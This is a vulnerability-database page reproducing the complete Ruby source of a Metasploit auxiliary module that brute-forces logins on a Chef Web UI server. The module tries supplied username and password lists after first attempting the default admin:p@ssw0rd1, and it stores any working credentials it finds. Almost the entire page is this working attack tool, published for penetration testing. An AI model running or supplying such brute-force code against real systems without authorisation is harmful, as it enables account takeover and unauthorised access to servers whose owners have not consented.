Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
metasploitHdm <[email protected]>MSF:AUXILIARY-SCANNER-HTTP-CHEF_WEBUI_LOGIN-
HistoryFeb 18, 2015 - 5:49 a.m.

Chef Web UI Brute Force Utility

2015-02-1805:49:57
hdm <[email protected]>
www.rapid7.com
11

7.5 High

AI Score

Confidence

Low

JSON

This module attempts to login to Chef Web UI server instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It will also test for the default login (admin:p@ssw0rd1).

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/login_scanner/chef_webui'
require 'metasploit/framework/credential_collection'

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Chef Web UI Brute Force Utility',
      'Description'    => %q{
        This module attempts to login to Chef Web UI server instance using username and password
        combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options. It
        will also test for the default login (admin:p@ssw0rd1).
      },
      'Author'         =>
        [
          'hdm'
        ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
      {
        'SSL'         => true,
      }
    )

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('USERNAME', [false, 'The username to specify for authentication', '']),
        OptString.new('PASSWORD', [false, 'The password to specify for authentication', '']),
        OptString.new('TARGETURI', [ true,  'The path to the Chef Web UI application', '/']),
      ])
  end

  #
  # main
  #
  def run_host(ip)
    init_loginscanner(ip)
    msg = @scanner.check_setup
    if msg
      print_brute :level => :error, :ip => rhost, :msg => msg
      return
    end

    print_brute :level=>:status, :ip=>rhost, :msg=>("Found Chef Web UI application at #{datastore['TARGETURI']}")
    bruteforce(ip)
  end

  def bruteforce(ip)
    @scanner.scan! do |result|
      case result.status
        when Metasploit::Model::Login::Status::SUCCESSFUL
          print_brute :level => :good, :ip => ip, :msg => "Success: '#{result.credential}'"
          do_report(ip, rport, result)
          :next_user
        when Metasploit::Model::Login::Status::DENIED_ACCESS
          print_brute :level => :status, :ip => ip, :msg => "Correct credentials, but unable to login: '#{result.credential}'"
          do_report(ip, rport, result)
          :next_user
        when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT
          if datastore['VERBOSE']
            print_brute :level => :verror, :ip => ip, :msg => "Could not connect"
          end
          invalidate_login(
            address: ip,
            port: rport,
            protocol: 'tcp',
            public: result.credential.public,
            private: result.credential.private,
            realm_key: result.credential.realm_key,
            realm_value: result.credential.realm,
            status: result.status
          )
          :abort
        when Metasploit::Model::Login::Status::INCORRECT
          if datastore['VERBOSE']
            print_brute :level => :verror, :ip => ip, :msg => "Failed: '#{result.credential}'"
          end
          invalidate_login(
            address: ip,
            port: rport,
            protocol: 'tcp',
            public: result.credential.public,
            private: result.credential.private,
            realm_key: result.credential.realm_key,
            realm_value: result.credential.realm,
            status: result.status
          )
      end
    end
  end

  def do_report(ip, port, result)
    service_data = {
      address: ip,
      port: port,
      service_name: 'http',
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      module_fullname: self.fullname,
      origin_type: :service,
      private_data: result.credential.private,
      private_type: :password,
      username: result.credential.public,
    }.merge(service_data)

    credential_core = create_credential(credential_data)

    login_data = {
      core: credential_core,
      last_attempted_at: DateTime.now,
      status: result.status
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def init_loginscanner(ip)
    @cred_collection = build_credential_collection(
      username: datastore['USERNAME'],
      password: datastore['PASSWORD']
    )

    # Always try the default first
    @cred_collection.prepend_cred(
      Metasploit::Framework::Credential.new(public: 'admin', private: 'p@ssw0rd1')
    )

    @scanner = Metasploit::Framework::LoginScanner::ChefWebUI.new(
      configure_http_login_scanner(
        uri:                datastore['TARGETURI'],
        cred_details:       @cred_collection,
        stop_on_success:    datastore['STOP_ON_SUCCESS'],
        bruteforce_speed: datastore['BRUTEFORCE_SPEED'],
        connection_timeout: 5,
        http_username: datastore['HttpUsername'],
        http_password: datastore['HttpPassword']
      )
    )
  end
end

7.5 High

AI Score

Confidence

Low

JSON